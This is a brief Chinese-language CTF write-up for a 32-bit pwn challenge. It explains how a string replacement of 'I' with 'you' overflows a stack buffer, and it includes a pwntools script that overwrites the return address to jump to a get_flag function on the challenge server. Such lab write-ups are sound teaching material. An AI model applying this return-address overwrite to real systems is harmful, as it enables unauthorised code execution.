代码分析
查看文件信息然后进行反汇编
关键信息
- 32位
- 栈不可执行
IDA反汇编
说实话,这个应该是C++编写的程序,C++基础还是不行,我硬是没看懂这个代码
我查了一下字符串
这里的get_flag是函数,另一个应该就是执行的一个命令了
到IDA中查找
TAB切换到汇编,再空格
先给他地址记下 08048F0D
这里网上说是把 I 换成 you导致了溢出,输入I就多出了2个字符,s的空间为32字节,足够我们溢出8字节了
EXP
s距离BP为0x3C ,0x3C / 3 = 20,我们只需要20个I就能到达BP的位置,然后 + 4个字节填充BP
from pwn import *p = remote("node4.buuoj.cn",28244)
p.sendline(flat([b"I" * 20, b'a'*4, 0x08048F0D]))
p.interactive()
